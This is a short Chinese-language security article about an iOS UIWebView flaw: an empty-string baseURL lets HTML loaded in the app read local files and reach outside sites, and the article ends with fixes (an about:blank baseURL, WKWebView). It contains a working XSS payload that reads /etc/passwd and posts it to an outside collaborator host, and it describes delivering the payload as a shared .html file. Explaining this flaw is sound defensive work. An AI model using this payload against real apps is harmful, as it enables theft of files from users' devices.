本文介绍一个简单的,但是潜在危险性特别大、而且在iOS app中经常出现的安全漏洞。
该漏洞非常简单,但是常常被误解,当开发者在代码中是设置webView时,经常会看到:
[webView loadHTMLString:someHTMLstring baseURL:[NSURL URLWithString:@""]]许多开发者都认为设置baseURL为@””,表示是安全的,因为baseurl被指定为空字符串,攻击者也不能加载请求到随机的恶意网站。但事实上不是这样的。
当baseURL被设置为空字符串时,攻击者可以绕过SOP保护访问APP的文件系统(使用file:// url方案)和任何外部网站。
另一个需要注意的方法是loadData:MIMEType:textEncodingName:baseURL。
错误配置可以以多种方式利用。最常见的就是文件共享,用户可以在web视图中打开文件。比如一个简单的XSS payload:
<script>var request = new XMLHttpRequest();
request.open("GET","file:///etc/passwd",false);
request.send();
request.open("POST","http://nc3fefxjk1kpku6504yvqzeyspyjm8.burpcollaborator.net",false);
request.send(request.responseText);
</script>
这个简单的payload可以打开手机的/etc/passwd文件,然后发送其中的内容到攻击者服务器。
研究人员将其保存为.html文件,并于iCloud进行同步,然后再通过苹果的Files APP在APP内分享。
然后,当用户打开该文件时:
研究人员就接收到了用户的etc/passwd文件。
其他潜在的利用方法有:
APP内打开URL/Web浏览:攻击者可以发送给受害者一个恶意URL,当用户点击时,就可以在APP的web视图中打开链接。
URL scheme滥用:攻击者可以通过邮件或iMessage等外部通信方式发送一个恶意URL。如果打开链接的URL scheme在webView中,就可以进行利用。
如何应对?应对该漏洞的最简单的办法就是将baseURL参数设置为about:blank而不是空字符串。比如:
[webView loadHTMLString:someHTMLstring baseURL:[NSURL URLWithString:@"about:blank"]]现在webView已经从手机的文件系统中沙箱化了,攻击者可能可以进行弹窗,但是不能窃取数据或与恶意服务器进行通信。如果用户从文件系统中加载内嵌图像,该方案可能会干预APP的这一功能。
如果开发者选择使用新的WKWebView类,而不是老版本的UIWebView,那么这类攻击发生的可能性就会小很多。因为WKWebView增强了安全性,默认情况下不允许对本地文件系统进行AJAX请求,所以前面描述的攻击就都不能实现了。而且WKWebView还有一个开启/关闭javascript执行的新功能。